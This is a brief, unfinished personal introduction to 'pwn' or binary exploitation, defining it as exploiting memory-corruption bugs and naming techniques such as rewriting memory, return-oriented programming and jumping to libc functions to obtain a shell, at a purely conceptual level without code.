There are a lot of high quality articles about pwn, but I want to share my experience and thus find my mistakes and complete my knowledge. Enjoy.
🔧 work in progress
Refering to the ‘binary exploitation’ category,
pwn is about exploiting weaknesses in low-level and bad code issues. For exemple corrupting the memory if a program does not sanitise the user input.
Re-write memory on the fly.
Use ‘code’ in the binary to chain small instructions and re-write data.
Use ROP to execute code, use compiled
libc in the binary to jump to any
libc function. Usefull to get a shell.